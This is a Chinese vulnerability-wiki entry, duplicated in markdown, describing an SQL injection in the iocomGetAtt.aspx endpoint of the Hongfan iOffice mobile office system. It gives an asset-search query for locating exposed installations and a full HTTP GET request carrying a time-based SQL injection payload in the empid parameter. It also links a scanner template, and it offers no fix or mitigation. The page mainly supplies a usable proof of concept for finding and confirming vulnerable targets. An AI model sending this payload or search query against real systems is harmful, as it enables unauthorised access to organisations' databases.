fofamini-wiki

登录白背景

源码

红帆iOffice iocomGetAtt存在SQL注入漏洞

一、漏洞简介

红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆iOffice iocomGetAtt存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

二、影响版本

红帆iOffice

三、资产测绘

hunterapp.name="红帆 iOffice"
特征

四、漏洞复现

GET /ioffice/prg/interface/iocomGetAtt.aspx?NewPdf=1&empid=1;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=ahhuozybbvs4srud0ezfh545
Upgrade-Insecure-Requests: 1

红帆-ioffice-iocomgetatt-sql注入.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/vqipwatn7lc7fyzd

# 红帆iOffice iocomGetAtt存在SQL注入漏洞

# 一、漏洞简介
红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆iOffice iocomGetAtt存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

# 二、影响版本

- 红帆iOffice

# 三、资产测绘

- hunter`app.name="红帆 iOffice"`
- 特征

![image.png](./img/7P-2LJ-CcfZMHPUI/1700318852791-79cb8d86-c4b4-434d-baa6-02cd8c68c5bc-370609.png)

# 四、漏洞复现
```
GET /ioffice/prg/interface/iocomGetAtt.aspx?NewPdf=1&empid=1;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=ahhuozybbvs4srud0ezfh545
Upgrade-Insecure-Requests: 1
```
![image.png](./img/7P-2LJ-CcfZMHPUI/1708916999640-084aa9ed-06e0-462b-b81e-98fcb515cce9-104513.png)
[红帆-ioffice-iocomgetatt-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219601287-e002125c-7ba5-4f43-a609-979120d0e3db.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219601287-e002125c-7ba5-4f43-a609-979120d0e3db.yaml%22%2C%22name%22%3A%22%E7%BA%A2%E5%B8%86-ioffice-iocomgetatt-sql%E6%B3%A8%E5%85%A5.yaml%22%2C%22size%22%3A1952%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22uaafe0ddf-6e85-4286-82c1-68877a39e23%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u00049f84%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vqipwatn7lc7fyzd>